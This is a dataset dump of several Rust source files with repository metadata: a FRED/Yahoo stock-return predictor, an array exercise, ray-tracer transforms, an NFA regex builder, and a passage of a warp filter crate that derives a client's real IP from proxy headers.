}
| true |
1f224825e7ec62d3a7d79c30570a16399902c26d
|
Rust
|
hn3000/greatest-predictor
|
/src/lib.rs
|
UTF-8
| 8,139 | 2.515625 | 3 |
[] |
no_license
|
use chrono::{Datelike, NaiveDate};
use serde::{Deserialize,Serialize};
use std::iter::Peekable;
/// One row of the FRED stock-allocation CSV download.
#[derive(Debug, Deserialize)]
pub struct AllocationRecord {
    /// Observation date (CSV column `DATE`).
    #[serde(rename = "DATE")]
    pub date: NaiveDate,
    /// Aggregate stock-allocation share as a fraction.
    // NOTE(review): the useful range appears to be roughly 0.15..0.55 given
    // `allocation_to_return`'s interpolation — confirm against the FRED series.
    #[serde(rename = "NCBEILQ027S_BCNSDODNS_CMDEBT_FGSDODNS_SLGSDODNS_FBCELLQ027S_DODFFSWCMI")]
    pub allocation: f64,
}
/// Download the aggregate stock-allocation series from FRED and parse the
/// returned CSV into `AllocationRecord`s.
///
/// The `fml` query parameter asks FRED to compute
/// `((a+f)/1000) / (((a+f)/1000)+b+c+d+e+g)` server-side, so the CSV already
/// contains the allocation ratio.
pub async fn fetch_stock_allocation() -> Result<Vec<AllocationRecord>, anyhow::Error> {
    let fut = reqwest::get("https://fred.stlouisfed.org/graph/fredgraph.csv?id=NCBEILQ027S_BCNSDODNS_CMDEBT_FGSDODNS_SLGSDODNS_FBCELLQ027S_DODFFSWCMI&cosd=1951-10-01&coed=2100-01-01&fml=%28%28a%2Bf%29%2F1000%29%2F%28%28%28a%2Bf%29%2F1000%29%2Bb%2Bc%2Bd%2Be%2Bg%29");
    let result = fut.await?;
    let csv = result.text().await?;
    //println!("{}", csv);
    let mut xx = csv::Reader::from_reader(csv.as_bytes());
    // Collecting into Result fails on the first malformed row rather than
    // silently skipping it.
    let result = xx
        .deserialize()
        .collect::<Result<Vec<AllocationRecord>, _>>()?;
    Ok(result)
}
/// One row of a Yahoo Finance historical-prices CSV.
#[derive(Debug, Deserialize)]
pub struct Snp500Record {
    /// Trading day (CSV column `Date`).
    #[serde(rename = "Date")]
    pub date: NaiveDate,
    /// Adjusted closing price (CSV column `Adj Close`).
    #[serde(rename = "Adj Close")]
    pub closing_price: f64,
}
/*
static yahooUrl = 'https://finance.yahoo.com/quote/%5ESP500TR/history?p=%5ESP500TR';
static dailyCsvUrl = 'https://query1.finance.yahoo.com/v7/finance/download/%5ESP500TR?period1=${lastYear}&period2=2500000000&interval=1d&events=history&crumb=';
*/
/// Yahoo Finance tickers for the S&P 500 price index and total-return index.
#[derive(Clone,Copy)]
pub enum Snp500Symbol {
    SNP500,
    SNP500TR
}
impl Snp500Symbol {
    /// URL-encoded ticker for Yahoo Finance queries (`%5E` is an escaped `^`).
    pub fn as_str(self) -> &'static str {
        if let Snp500Symbol::SNP500 = self {
            "%5EGSPC"
        } else {
            "%5ESP500TR"
        }
    }
}
/// Download the full daily price history for `symbol` from Yahoo Finance and
/// parse it into `Snp500Record`s (date + adjusted close).
pub async fn fetch_snp500_data(symbol: Snp500Symbol) -> Result<Vec<Snp500Record>, anyhow::Error> {
    // `cfg(any())` is never true, so this legacy crumb-scraping flow is
    // compiled out entirely; it is kept only as reference for the old
    // cookie/crumb-authenticated download endpoint.
    #[cfg(any())]
    {
        let pageurl = format!("https://finance.yahoo.com/quote/{}/history", symbol.as_str());
        let page = reqwest::get(pageurl)
            .await?
            .text()
            .await?;
        let re = regex::Regex::new(r#""CrumbStore":\{"crumb":"([^"]*)"\}"#)?;
        let crumb = re
            .captures(&page)
            .ok_or_else(|| anyhow!("crumbled cookie: no crumb"))?
            .get(1)
            .ok_or_else(|| anyhow!("crumbled cookie: no crumb, either"))?
            .as_str()
            .replace(r"\u002F", "/");
        dbg!(&crumb);
        let csvurl = format!("https://query1.finance.yahoo.com/v7/finance/download/{0}?period1=${lastYear}&period2=2500000000&interval=1d&events=history&crumb={1}", &symbol.as_str(), &crumb);
    }
    // The unauthenticated endpoint; period1/period2 are fixed epoch bounds
    // wide enough to cover the whole available history.
    let csvurl = format!("https://query1.finance.yahoo.com/v7/finance/download/{0}?period1=-576032400&period2=4102441200&interval=1d&events=history&includeAdjustedClose=true", symbol.as_str());
    let csvtext = reqwest::get(&csvurl)
        .await?
        .text()
        .await?;
    //dbg!(&csvtext);
    let mut csvrdr = csv::Reader::from_reader(csvtext.as_bytes());
    // Fail on the first malformed row rather than skipping it.
    let result = csvrdr
        .deserialize()
        .collect::<Result<Vec<Snp500Record>, _>>()?;
    Ok(result)
}
/// An allocation observation joined with the S&P 500 price in effect on or
/// just after the same date; produced by `combined_records`.
#[derive(Debug, Deserialize)]
pub struct CombinedRecord {
    /// Allocation date shifted forward by ten years.
    #[serde(rename = "Date")]
    pub date: NaiveDate,
    #[serde(rename = "StockAllocation")]
    pub stock_allocation: f64,
    #[serde(rename = "Snp500Price")]
    pub snp500_price: f64,
    /// Always `None` as currently produced by `combined_records`.
    #[serde(rename = "Snp500Return")]
    pub snp500_return: Option<f64>,
}
/// A ten-year-forward prediction derived from one allocation observation,
/// plus the realized price when the target date is already in the data.
#[derive(Debug, Deserialize, Serialize)]
pub struct PredictionRecord {
    /// Target date: allocation date plus ten years.
    #[serde(rename = "Date")]
    pub date: NaiveDate,
    /// Predicted annualized return from `allocation_to_return`.
    #[serde(rename = "Snp500ReturnPredicted")]
    pub snp500_return_predicted: f64,
    /// Price implied by compounding the predicted return for a decade.
    #[serde(rename = "Snp500PricePredicted")]
    pub snp500_price_predicted: f64,
    /// Realized price at the target date, if the data reaches that far.
    #[serde(rename = "Snp500PriceActual")]
    pub snp500_price_actual: Option<f64>,
}
/// Map an aggregate stock-allocation fraction to a predicted annual return
/// by linear interpolation: 15% allocation maps to +25% return and 55%
/// allocation maps to -6% return (figures from the referenced article).
pub fn allocation_to_return(allocation: f64) -> f64 {
    const ALLOC_LO: f64 = 0.15;
    const ALLOC_HI: f64 = 0.55;
    const RET_AT_LO: f64 = 0.25;
    const RET_AT_HI: f64 = -0.06;
    // Position of `allocation` within the [ALLOC_LO, ALLOC_HI] band.
    let t = (allocation - ALLOC_LO) / (ALLOC_HI - ALLOC_LO);
    RET_AT_LO - t * (RET_AT_LO - RET_AT_HI)
}
/// Compound `price_now` at `predicted_return` per year for one decade.
pub fn price_now_to_price_in_10y(price_now: f64, predicted_return: f64) -> f64 {
    let decade_growth = (1.0 + predicted_return).powi(10);
    price_now * decade_growth
}
/// Join each allocation record with the first S&P 500 close on or after its
/// date, emitting a `CombinedRecord` dated ten years later. Allocations that
/// predate the price data, or whose +10y date cannot be formed, are dropped.
pub fn combined_records(allocations: &[AllocationRecord], snp500: &[Snp500Record]) -> Vec<CombinedRecord> {
    let allocation_iter = allocations.iter();
    // NOTE(review): this outer iterator is only used for the initial `peek`;
    // the closure below shadows it with a fresh one per allocation.
    let mut snp_iter = snp500.iter().peekable();
    if let Some(snpfirst) = snp_iter.peek() {
        // Skip allocations that fall before the earliest price observation.
        let allocations_with_snp = allocation_iter.skip_while(|x| x.date < snpfirst.date);
        let combined_records = allocations_with_snp.filter_map(|x| {
            // NOTE(review): rescanning `snp500` from the start for every
            // allocation makes this O(n*m); an iterator advanced
            // monotonically (as in `prediction_records`) would be O(n+m).
            let mut snp_iter = snp500.iter().peekable();
            loop {
                if let Some(snp_current) = snp_iter.peek() {
                    if snp_current.date < x.date {
                        let _ = snp_iter.next();
                    } else {
                        // `with_year` returns None for impossible dates
                        // (e.g. Feb 29 in a non-leap target year).
                        if let Some(date_new) = x.date.with_year(x.date.year() + 10) {
                            let prediction = CombinedRecord {
                                date: date_new,
                                stock_allocation: x.allocation,
                                snp500_price: snp_current.closing_price,
                                snp500_return: None,
                            };
                            break Some(prediction);
                        } else {
                            break None
                        }
                    }
                } else {
                    break None;
                }
            }
        });
        combined_records.collect()
    } else {
        Vec::new()
    }
}
/// For each allocation record, emit a `PredictionRecord` containing the
/// predicted 10-year return/price (from the first S&P close on or after the
/// allocation date) and, when the data reaches that far, the realized price
/// at the +10y target date.
///
/// Both price iterators advance monotonically across allocations (the input
/// is assumed date-sorted), so the whole join is a single forward pass.
pub fn prediction_records(allocations: &[AllocationRecord], snp500: &[Snp500Record]) -> Vec<PredictionRecord> {
    if let Some(snpfirst) = snp500.first() {
        // Skip allocations that fall before the earliest price observation.
        let allocations_with_snp = allocations.iter().skip_while(|x| x.date < snpfirst.date);
        // Pairs of consecutive records: `next.date` tells us when the
        // currently peeked record stops being the best match.
        let mut snp_iter = snp500.iter().zip(snp500.iter().skip(1)).peekable();
        let mut snp_future_iter = snp500.iter().zip(snp500.iter().skip(1)).peekable();
        let prediction_records = allocations_with_snp.filter_map(|allocation_rec| {
            // NOTE(review): every path breaks on the first iteration, so the
            // `loop` only serves as an expression wrapper here.
            loop {
                snp_iter.mutating_skip_while(|(_, next)| next.date <= allocation_rec.date);
                if let Some((snp_current, _)) = snp_iter.next() {
                    let snp500_return_predicted = allocation_to_return(allocation_rec.allocation);
                    let snp500_price_predicted = price_now_to_price_in_10y(snp_current.closing_price, snp500_return_predicted);
                    // `with_year` returns None for impossible dates
                    // (e.g. Feb 29 in a non-leap target year).
                    if let Some(date_new) = allocation_rec.date.with_year(allocation_rec.date.year() + 10) {
                        let snp500_price_actual = {
                            snp_future_iter.mutating_skip_while(|(_, next)| next.date <= date_new);
                            snp_future_iter
                                .next()
                                .map(|(snp_current, _)| snp_current.closing_price)
                        };
                        let prediction = PredictionRecord {
                            date: date_new,
                            snp500_return_predicted,
                            snp500_price_predicted,
                            snp500_price_actual,
                        };
                        break Some(prediction);
                    } else {
                        break None
                    }
                } else {
                    break None;
                }
            }
        });
        prediction_records.collect()
    } else {
        Vec::new()
    }
}
/// Extension for `Peekable`: drop leading items matching a predicate,
/// mutating the iterator in place instead of consuming it.
trait IterSkipExt: Iterator {
    fn mutating_skip_while<F>(&mut self, pred: F)
    where F: FnMut(&Self::Item) -> bool;
}
impl<I: Iterator> IterSkipExt for Peekable<I> {
    /// Consume items from the front while `pred` holds; the first
    /// non-matching item (if any) is left in place for `peek`/`next`.
    fn mutating_skip_while<F>(&mut self, mut pred: F)
    where F: FnMut(&Self::Item) -> bool,
    {
        // `next_if` advances only when the peeked item satisfies the
        // predicate — exactly the manual peek/next dance, minus the loop.
        while self.next_if(&mut pred).is_some() {}
    }
}
| true |
f240b72cc965b7baae51e997cceb8abc143d359a
|
Rust
|
suyanlongfamily/rust_study
|
/Study/arry.rs
|
UTF-8
| 287 | 3.796875 | 4 |
[] |
no_license
|
fn main() {
    // Fixed-size array of three i32s, zero-initialized, then partially filled.
    let mut values: [i32; 3] = [0; 3];
    values[1] = 1;
    values[2] = 2;
    // A reference to the tail slice compares equal to the expected array.
    assert_eq!([1, 2], &values[1..]);
    // Iterate over a reference to the array; &[T; N] implements IntoIterator.
    for item in &values {
        println!("{}---", item);
    }
}
| true |
5593f28e280a311c07d0c40eda53b79b4ea6f841
|
Rust
|
elpnt/rust-rtnw
|
/src/translate.rs
|
UTF-8
| 3,920 | 3.015625 | 3 |
[] |
no_license
|
use crate::aabb::AABB;
use crate::hitable::{HitRecord, Hitable};
use crate::ray::Ray;
use crate::vec3::Vec3;
use std::f32::consts::PI;
/// Instance wrapper that displaces another hitable by a fixed offset.
pub struct Translate<H: Hitable> {
    /// The wrapped object, hit-tested in its own local frame.
    pub hitable: H,
    /// World-space displacement applied to the wrapped object.
    pub offset: Vec3,
}
impl<H: Hitable> Translate<H> {
    /// Wrap `hitable`, shifting it by `offset` in world space.
    pub fn new(hitable: H, offset: Vec3) -> Self {
        Self { hitable, offset }
    }
}
impl<H: Hitable> Hitable for Translate<H> {
    /// Hit-test by shifting the ray into the object's local frame, then
    /// shifting any resulting hit point back into world space.
    fn hit(&self, r: &Ray, t_min: f32, t_max: f32) -> Option<HitRecord> {
        let moved_r = Ray::new(r.origin - self.offset, r.direction, r.time);
        self.hitable.hit(&moved_r, t_min, t_max).map(|mut rec| {
            rec.p += self.offset;
            rec
        })
    }
    /// Bounding box is the wrapped object's box translated by `offset`.
    fn bounding_box(&self, t0: f32, t1: f32) -> Option<AABB> {
        self.hitable.bounding_box(t0, t1).map(|mut bbox| {
            bbox.min += self.offset;
            bbox.max += self.offset;
            bbox
        })
    }
}
/// Instance wrapper that rotates another hitable about the y axis
/// (only x and z coordinates are transformed).
pub struct Rotate<H: Hitable> {
    pub hitable: H,
    /// Sine of the rotation angle, precomputed in `new`.
    pub sin_theta: f32,
    /// Cosine of the rotation angle, precomputed in `new`.
    pub cos_theta: f32,
    /// Axis-aligned box enclosing the rotated object, precomputed in `new`.
    pub bbox: Option<AABB>,
}
impl<H: Hitable> Rotate<H> {
    /// Wrap `hitable`, rotating it by `angle` degrees about the y axis.
    ///
    /// Precomputes sin/cos and a world-space AABB by rotating all eight
    /// corners of the wrapped object's box and taking the extremes.
    ///
    /// # Panics
    /// Panics if the wrapped object has no bounding box (`unwrap` below).
    pub fn new(hitable: H, angle: f32) -> Self {
        let radians: f32 = (PI / 180.0) * angle;
        let sin_theta: f32 = radians.sin();
        let cos_theta: f32 = radians.cos();
        // Box is computed once for the time interval [0, 1].
        let bbox = hitable.bounding_box(0.0, 1.0).unwrap();
        let mut min = Vec3::new(std::f32::MAX, std::f32::MAX, std::f32::MAX);
        let mut max = Vec3::new(-std::f32::MAX, -std::f32::MAX, -std::f32::MAX);
        // Visit all 8 corners: each of i/j/k selects min or max per axis.
        for i in 0..2 {
            for j in 0..2 {
                for k in 0..2 {
                    let x: f32 = i as f32 * bbox.max.x + (1.0 - i as f32) * bbox.min.x;
                    let y: f32 = j as f32 * bbox.max.y + (1.0 - j as f32) * bbox.min.y;
                    let z: f32 = k as f32 * bbox.max.z + (1.0 - k as f32) * bbox.min.z;
                    // Forward (object -> world) rotation of the corner.
                    let new_x: f32 = cos_theta * x + sin_theta * z;
                    let new_z: f32 = -sin_theta * x + cos_theta * z;
                    let tester = Vec3::new(new_x, y, new_z);
                    // Expand the running min/max per component.
                    for c in 0..3 {
                        if tester[c] > max[c] {
                            max[c] = tester[c];
                        }
                        if tester[c] < min[c] {
                            min[c] = tester[c]
                        }
                    }
                }
            }
        }
        let bbox = AABB::new(min, max);
        Rotate {
            hitable,
            sin_theta,
            cos_theta,
            bbox: Some(bbox),
        }
    }
}
impl<H: Hitable> Hitable for Rotate<H> {
    /// Hit-test by rotating the ray into object space, delegating to the
    /// wrapped hitable, then rotating the hit point and normal back out.
    fn hit(&self, r: &Ray, t_min: f32, t_max: f32) -> Option<HitRecord> {
        // World -> object space: inverse rotation
        // (x' = c*x - s*z, z' = s*x + c*z).
        let mut origin: Vec3 = r.origin;
        let mut direction: Vec3 = r.direction;
        origin.x = self.cos_theta * r.origin.x - self.sin_theta * r.origin.z;
        origin.z = self.sin_theta * r.origin.x + self.cos_theta * r.origin.z;
        direction.x = self.cos_theta * r.direction.x - self.sin_theta * r.direction.z;
        direction.z = self.sin_theta * r.direction.x + self.cos_theta * r.direction.z;
        let rotated_r = Ray::new(origin, direction, r.time);
        if let Some(mut rec) = self.hitable.hit(&rotated_r, t_min, t_max) {
            // Object -> world space: forward rotation
            // (x' = c*x + s*z, z' = -s*x + c*z), matching the corner
            // transform used for the bounding box in `Rotate::new`.
            //
            // Bug fix vs. the original: `p.z` used `sin*p.x + sin*p.z`
            // (sin/cos typo), `normal.z` read `rec.normal.z` twice instead
            // of `rec.normal.x`, and the hit point was rotated with the
            // inverse (ray-side) rotation instead of the forward one.
            let mut p: Vec3 = rec.p;
            let mut normal: Vec3 = rec.normal;
            p.x = self.cos_theta * rec.p.x + self.sin_theta * rec.p.z;
            p.z = -self.sin_theta * rec.p.x + self.cos_theta * rec.p.z;
            normal.x = self.cos_theta * rec.normal.x + self.sin_theta * rec.normal.z;
            normal.z = -self.sin_theta * rec.normal.x + self.cos_theta * rec.normal.z;
            rec.p = p;
            rec.normal = normal;
            Some(rec)
        } else {
            None
        }
    }
    /// Returns the box precomputed in `Rotate::new` (built for t in [0, 1]);
    /// the requested time interval is therefore ignored.
    fn bounding_box(&self, t0: f32, t1: f32) -> Option<AABB> {
        self.bbox
    }
}
| true |
a9f618c512704ade4eb53f58df6d37a0aba1f41d
|
Rust
|
Mokosha/Regex-Rust
|
/src/nfa.rs
|
UTF-8
| 7,850 | 3.34375 | 3 |
[
"MIT"
] |
permissive
|
use std::collections::HashSet;
use expr::Expression;
use expr::Character;
/// What a `State::NeedsCharacter` transition will accept.
#[derive(Debug, PartialEq, Clone)]
pub enum ExpectedChar {
    /// Exactly this character.
    Specific(char),
    /// Any character at all (`.`).
    Wildcard,
    /// A character matching one of the listed alternatives.
    // NOTE(review): presumably a `[...]` set — confirm in the `expr` module.
    Any(Vec<Character>),
    /// A character matching none of the listed alternatives.
    // NOTE(review): presumably a `[^...]` set — confirm in the `expr` module.
    None(Vec<Character>)
}
/// A single NFA state; `usize` values index into `NFA::states`.
#[derive(Debug, PartialEq, Clone)]
pub enum State {
    /// Accepting state.
    Success,
    // In order to transition to the state indexed, it needs a character
    NeedsCharacter(ExpectedChar, usize),
    // Branches into two states
    Branch(usize, usize)
}
impl State {
    /// Shorthand constructor for a two-way branch.
    fn branch(id1: usize, id2: usize) -> State {
        State::Branch(id1, id2)
    }
    /// Shift every state index in this transition by `off`.
    fn offset(self, off: usize) -> State {
        // All indices are >= 0, so this degenerates to an unconditional shift.
        self.offset_from(0, off)
    }
    /// Shift only indices that are `>= from` by `off`; indices pointing
    /// before `from` are left untouched.
    fn offset_from(self, from: usize, off: usize) -> State {
        let shift = |id: usize| if id >= from { id + off } else { id };
        match self {
            State::Success => State::Success,
            State::NeedsCharacter(c, id) => State::NeedsCharacter(c, shift(id)),
            State::Branch(id1, id2) => State::Branch(shift(id1), shift(id2)),
        }
    }
}
/// A nondeterministic finite automaton: a flat vector of states addressed
/// by index. By convention, index 0 holds the `Success` state and the
/// highest index is the entry point.
#[derive(Debug, PartialEq, Clone)]
pub struct NFA {
    states: Vec<State>,
}
impl NFA {
    /// NFA containing only the `Success` state at index 0.
    fn new() -> NFA { NFA { states: vec![State::Success] } }
    /// Two-state NFA: state 1 consumes `c` and moves to success state 0.
    fn with_char(c: ExpectedChar) -> NFA {
        NFA { states: vec![ State::Success, State::NeedsCharacter(c, 0) ] }
    }
    fn char_st(c: char) -> NFA { NFA::with_char(ExpectedChar::Specific(c)) }
    fn wildcard() -> NFA { NFA::with_char(ExpectedChar::Wildcard) }
    fn any(chars: Vec<Character>) -> NFA { NFA::with_char(ExpectedChar::Any(chars)) }
    fn none(chars: Vec<Character>) -> NFA { NFA::with_char(ExpectedChar::None(chars)) }
    pub fn state_at<'a>(&'a self, at: usize) -> &'a State { &self.states[at] }
    pub fn num_states(&self) -> usize { self.states.len() }
    /// Insert `st` at index `at`, then renumber existing transitions so
    /// they keep pointing at the same logical states.
    // NOTE(review): the `if i == at { at } else { at - 1 }` threshold is
    // subtle, and `at - 1` underflows when `at == 0`; current callers
    // (`build_nfa`) only ever pass `at == 1` — confirm before reusing.
    fn insert(&mut self, at: usize, st: State) {
        self.states.insert(at, st);
        self.states = self.states.iter().enumerate().map(|(i, s)| {
            s.clone().offset_from(if i == at { at } else { at - 1 }, 1)
        }).collect();
    }
    // Places all the exit points of self onto the beginning
    // of other...
    fn concat(self, other: NFA) -> NFA {
        // Invariant: first state should be success state
        assert_eq!(self.states[0], State::Success);
        assert_eq!(other.states[0], State::Success);
        // We concatenate the two vectors together, and then
        // update all references of the second to be += first.len()
        let off = other.states.len() - 1;
        // NOTE(review): trivially true — `other.states[0]` was already
        // indexed above, and `len() - 1` would have panicked on underflow.
        assert!(other.states.len() != 0);
        // `self`'s success state is dropped; its remaining states are
        // appended to `other` with their indices shifted past it, so
        // `self`'s exits now land on `other`'s entry.
        self.states.iter().fold(other, |nfa, state| {
            let s = state.clone();
            match s {
                State::Success => nfa,
                _ => {
                    let mut new_nfa = nfa.clone();
                    new_nfa.states.push(s.offset(off));
                    new_nfa
                }
            }
        })
    }
    /// Starting from the states in `st`, follow branches and "empty"
    /// transitions (Any/None with no alternatives) and return the set of
    /// reachable states that actually consume input or are terminal.
    pub fn remove_branches(&self, st: HashSet<usize>) -> HashSet<usize> {
        let mut check_states: Vec<_> = st.clone().iter().map(|k| *k).collect();
        let mut checked_states: HashSet<usize> = HashSet::new();
        let mut branchless_states: HashSet<usize> = HashSet::new();
        loop {
            let st_idx = {
                match check_states.pop() {
                    None => break,
                    Some(st) => st
                }
            };
            match self.states[st_idx].clone() {
                // We can consider some of these states as "empty"
                State::NeedsCharacter(ExpectedChar::Any(chars), next) => {
                    if chars.is_empty() {
                        if !checked_states.contains(&next) {
                            check_states.push(next);
                        }
                    } else {
                        branchless_states.insert(st_idx);
                    }
                },
                State::NeedsCharacter(ExpectedChar::None(chars), next) => {
                    if chars.is_empty() {
                        if !checked_states.contains(&next) {
                            check_states.push(next);
                        }
                    } else {
                        branchless_states.insert(st_idx);
                    }
                },
                // We don't check for success here, but on the next loop
                // iteration we should know that we can...
                State::Branch(id1, id2) => {
                    if !checked_states.contains(&id1) {
                        check_states.push(id1);
                    }
                    if !checked_states.contains(&id2) {
                        check_states.push(id2);
                    }
                },
                _ => {
                    branchless_states.insert(st_idx);
                }
            }
            checked_states.insert(st_idx);
        }
        branchless_states
    }
}
/// Recursively compile a parsed regex `Expression` into an `NFA`
/// (Thompson-style construction over the flat state vector).
pub fn build_nfa (expr: Expression) -> NFA {
    match expr {
        Expression::Char(c) => NFA::char_st(c),
        Expression::Wildcard => NFA::wildcard(),
        Expression::Any(chars) => NFA::any(chars),
        Expression::None(chars) => NFA::none(chars),
        // Sequence: chain sub-NFAs together, exit-to-entry.
        Expression::All(exprs) => exprs.iter().fold(NFA::new(), |nfa, e| {
            nfa.concat(build_nfa(e.clone()))
        }),
        Expression::Choice(e1, e2) => {
            let mut e1_nfa = build_nfa(*e1);
            let e2_nfa = build_nfa(*e2);
            let n = e1_nfa.states.len();
            let m = e2_nfa.states.len();
            // Append each state in sequence, which is effectively a concat, but
            // instead of the success state, we need to place an epsilon transition
            // to the success state of the e1 nfa.
            for s in e2_nfa.states {
                if s == State::Success {
                    // !HACK! We need an epsilon transition here, but not necessarily
                    // a branch. A branch where both states end up in the same place
                    // is effectively a singular epsilon transition.
                    e1_nfa.states.push(State::branch(0, 0));
                } else {
                    // Each of these states has 'n' states in front from the other nfa
                    e1_nfa.states.push(s.offset(n));
                }
            }
            // New entry: branch between the two alternatives' entry points.
            e1_nfa.states.push(State::branch(n - 1, n + m - 1));
            e1_nfa
        }
        Expression::NoneOrMore(expr) => {
            let mut expr_nfa = build_nfa(*expr);
            let last_state_id = expr_nfa.states.len() - 1;
            // Add the none branch
            expr_nfa.states.push(State::branch(0, last_state_id));
            // Add the more branch
            expr_nfa.insert(1, State::branch(0, last_state_id));
            expr_nfa
        },
        Expression::OneOrMore(expr) => {
            let mut expr_nfa = build_nfa(*expr);
            let last_state_id = expr_nfa.states.len() - 1;
            // Add the more branch
            expr_nfa.insert(1, State::branch(0, last_state_id))
            ;
            expr_nfa
        },
        Expression::NoneOrOne(expr) => {
            let mut expr_nfa = build_nfa(*expr);
            let last_state_id = expr_nfa.states.len() - 1;
            // Add the none branch
            expr_nfa.states.push(State::branch(0, last_state_id));
            expr_nfa
        }
    }
}
| true |
02e45dba705021a6f90302a79470f304d8150bac
|
Rust
|
icewind1991/warp-real-ip
|
/src/lib.rs
|
UTF-8
| 9,947 | 2.90625 | 3 |
[] |
no_license
|
use ipnetwork::IpNetwork;
use rfc7239::{parse, Forwarded, NodeIdentifier, NodeName};
use std::borrow::Cow;
use std::convert::Infallible;
use std::iter::{once, FromIterator, IntoIterator};
use std::net::{IpAddr, SocketAddr};
use std::str::FromStr;
use warp::filters::addr::remote;
use warp::Filter;
/// Represents a set of IP networks.
#[derive(Debug, Clone)]
pub struct IpNetworks {
    /// The networks tested, in insertion order, by `contains`.
    networks: Vec<IpNetwork>,
}
impl IpNetworks {
    /// True if `addr` falls inside at least one of the stored networks.
    pub fn contains(&self, addr: &IpAddr) -> bool {
        self.networks
            .iter()
            .any(|network| network.contains(*addr))
    }
}
impl From<Vec<IpAddr>> for IpNetworks {
fn from(addrs: Vec<IpAddr>) -> Self {
addrs.into_iter().collect()
}
}
impl From<&[IpAddr]> for IpNetworks {
fn from(addrs: &[IpAddr]) -> Self {
addrs.iter().copied().collect()
}
}
impl FromIterator<IpAddr> for IpNetworks {
fn from_iter<T: IntoIterator<Item = IpAddr>>(addrs: T) -> Self {
addrs.into_iter().map(IpNetwork::from).collect()
}
}
impl FromIterator<IpNetwork> for IpNetworks {
fn from_iter<T: IntoIterator<Item = IpNetwork>>(addrs: T) -> Self {
IpNetworks {
networks: addrs.into_iter().collect(),
}
}
}
/// Creates a `Filter` that provides the "real ip" of the connected client.
///
/// This uses the "x-forwarded-for" or "x-real-ip" headers set by reverse proxies.
/// To stop clients from abusing these headers, only headers set by trusted remotes will be accepted.
///
/// Note that if multiple forwarded-for addresses are present, which can be the case when using nested reverse proxies,
/// all proxies in the chain have to be within the list of trusted proxies.
///
/// ## Example
///
/// ```no_run
/// use warp::Filter;
/// use warp_real_ip::real_ip;
/// use std::net::IpAddr;
///
/// let proxy_addr = [127, 10, 0, 1].into();
/// warp::any()
/// .and(real_ip(vec![proxy_addr]))
/// .map(|addr: Option<IpAddr>| format!("Hello {}", addr.unwrap()));
/// ```
pub fn real_ip(
    trusted_proxies: impl Into<IpNetworks>,
) -> impl Filter<Extract = (Option<IpAddr>,), Error = Infallible> + Clone {
    let trusted_proxies = trusted_proxies.into();
    remote().and(get_forwarded_for()).map(
        move |addr: Option<SocketAddr>, forwarded_for: Vec<IpAddr>| {
            addr.map(|addr| {
                // Walk the hop chain starting from the nearest hop (the
                // socket peer) backwards; the first hop that is NOT a
                // trusted proxy is the client address we report.
                let hops = forwarded_for.iter().copied().chain(once(addr.ip()));
                for hop in hops.rev() {
                    if !trusted_proxies.contains(&hop) {
                        return hop;
                    }
                }
                // all hops were trusted, return the last one
                forwarded_for.first().copied().unwrap_or_else(|| addr.ip())
            })
        },
    )
}
/// Creates a `Filter` that extracts the ip addresses from the the "forwarded for" chain
///
/// Tried in order: `x-forwarded-for` (comma-separated list), `x-real-ip`
/// (single address, possibly quoted and/or bracketed), the RFC 7239
/// `forwarded` header, and finally an empty list when none are present.
pub fn get_forwarded_for() -> impl Filter<Extract = (Vec<IpAddr>,), Error = Infallible> + Clone {
    warp::header("x-forwarded-for")
        .map(|list: CommaSeparated<IpAddr>| list.into_inner())
        .or(warp::header("x-real-ip").map(|ip: String| {
            // Unparseable values yield an empty list rather than a rejection.
            IpAddr::from_str(maybe_bracketed(&maybe_quoted(&ip)))
                .map_or_else(|_| Vec::<IpAddr>::new(), |x| vec![x])
        }))
        .unify()
        .or(warp::header("forwarded").map(|header: String| {
            // RFC 7239: keep only `for=` entries that carry an IP node name.
            parse(&header)
                .filter_map(|forward| match forward {
                    Ok(Forwarded {
                        forwarded_for:
                            Some(NodeIdentifier {
                                name: NodeName::Ip(ip),
                                ..
                            }),
                        ..
                    }) => Some(ip),
                    _ => None,
                })
                .collect::<Vec<_>>()
        }))
        .unify()
        .or(warp::any().map(Vec::new))
        .unify()
}
/// Scanner state for splitting a comma-separated header value while
/// honouring double-quoted segments.
#[derive(Copy, Clone)]
enum CommaSeparatedIteratorState {
    /// Start of string or after a ',' (including whitespace)
    Default,
    /// Inside a double quote
    Quoted,
    /// After escape character inside quote
    QuotedPair,
    /// Non quoted part
    Token,
    /// After closing double quote
    PostAmbleForQuoted,
}
/// Iterator over the comma-separated elements of a header value; quoted
/// segments (which may contain escaped quotes and embedded commas) are
/// yielded whole, including their surrounding quotes.
struct CommaSeparatedIterator<'a> {
    /// target
    target: &'a str,
    /// iterator
    char_indices: std::str::CharIndices<'a>,
    /// current scanner state
    state: CommaSeparatedIteratorState,
    /// start position of the last token found
    s: usize,
}
impl<'a> CommaSeparatedIterator<'a> {
    /// Begin scanning `target` from the start, in the `Default` state.
    pub fn new(target: &'a str) -> Self {
        Self {
            target,
            char_indices: target.char_indices(),
            state: CommaSeparatedIteratorState::Default,
            s: 0,
        }
    }
}
impl<'a> Iterator for CommaSeparatedIterator<'a> {
    type Item = &'a str;
    /// Yield the next element as an untrimmed subslice of `target`; quoted
    /// elements are yielded with their quotes still in place.
    fn next(&mut self) -> Option<Self::Item> {
        for (i, c) in &mut self.char_indices {
            // Each step may emit an item (`next`) and always picks the
            // follow-up state (`next_state`).
            let (next, next_state) = match (self.state, c) {
                (CommaSeparatedIteratorState::Default, '"') => {
                    self.s = i;
                    (None, CommaSeparatedIteratorState::Quoted)
                }
                // Leading whitespace before an element is skipped.
                (CommaSeparatedIteratorState::Default, ' ' | '\t') => {
                    (None, CommaSeparatedIteratorState::Default)
                }
                // Empty element (leading or doubled comma) -> empty slice.
                (CommaSeparatedIteratorState::Default, ',') => (
                    Some(Some(&self.target[i..i])),
                    CommaSeparatedIteratorState::Default,
                ),
                (CommaSeparatedIteratorState::Default, _) => {
                    self.s = i;
                    (None, CommaSeparatedIteratorState::Token)
                }
                // Closing quote: emit the whole quoted span, quotes included.
                (CommaSeparatedIteratorState::Quoted, '"') => (
                    Some(Some(&self.target[self.s..i + 1])),
                    CommaSeparatedIteratorState::PostAmbleForQuoted,
                ),
                (CommaSeparatedIteratorState::Quoted, '\\') => {
                    (None, CommaSeparatedIteratorState::QuotedPair)
                }
                // The escaped character is consumed unconditionally.
                (CommaSeparatedIteratorState::QuotedPair, _) => {
                    (None, CommaSeparatedIteratorState::Quoted)
                }
                (CommaSeparatedIteratorState::Token, ',') => (
                    Some(Some(&self.target[self.s..i])),
                    CommaSeparatedIteratorState::Default,
                ),
